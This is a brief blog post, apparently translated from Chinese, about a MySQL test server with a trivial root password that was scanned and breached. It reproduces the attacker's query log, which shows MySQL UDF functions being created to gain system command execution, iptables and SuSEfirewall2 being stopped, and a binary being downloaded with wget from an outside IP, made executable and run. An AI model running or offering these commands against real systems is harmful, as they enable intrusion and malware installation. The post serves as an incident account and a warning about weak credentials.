a test library, because the previous deployment did not notice that it has a public address, so the password is also set relatively simple, directly Root Password set to 123456, did not expect to soon was scanned and logged in, and a user was built to try to use MySQL UDF Get machine system permissions. as follows:
108883 Connect [email protected]on
108883 Query CREATE FUNCTION sys_eval RETURNS string SONAME ' mysqludf.so '
108883 Query CREATE FUNCTION sys_eval RETURNS string SONAME ' mysqludf64.so '
108883 Query CREATE FUNCTION sys_eval RETURNS string SONAME ' lib_mysqludf.so '
108883 Query CREATE FUNCTION sys_eval RETURNS string SONAME ' udf.so '
108883 Query CREATE FUNCTION sys_eval RETURNS string SONAME ' xiaoji64.so '
108883 Query CREATE FUNCTION sys_eval RETURNS string SONAME ' xiaoji.so '
108883 Query CREATE FUNCTION sys_eval RETURNS string SONAME ' liunx32.so '
108883 Query CREATE FUNCTION sys_evalreturns string SONAME ' liunx64.so '
108883 Query Create function Sys_eval returns string Soname "Lib_mysqludf_sys.so"
108883 Query CREATE FUNCTION mylab_sys_exec RETURNS integersoname "mylab_sys_exec.so"
108883 Query system wget http://106.122.249.81:222/Client32
108883 Query system chmod +x Client32
108883 Query system chmod 777 Client32
System./client32
108883 Query Select Sys_eval ("/etc/init.d/iptablesstop;service iptables stop; SuSEfirewall2 stop;resusefirewall2 stop;wget-c
Http://106.122.249.81:222/Client32;chmod777 Client32;. /client32; ")
108883 Query SELECT mylab_sys_exec (/etc/init.d/iptables stop
108883 Query Service Iptables stop
108883 Query SuSEfirewall2 Stop
108883 Query reSuSEfirewall2 Stop
108883 Query wget-c Http://106.122.249.81:222/Client32
151208 10:09:40108883 Query chmod 777 Client32
108883 Query./client32
108883 Query ");
The right to the UDF is what happened, here is not elaborate.
This article is from the "Memory Fragments" blog, so be sure to keep this source http://weikle.blog.51cto.com/3324327/1761297
Security issues with UDF introduced in MySQL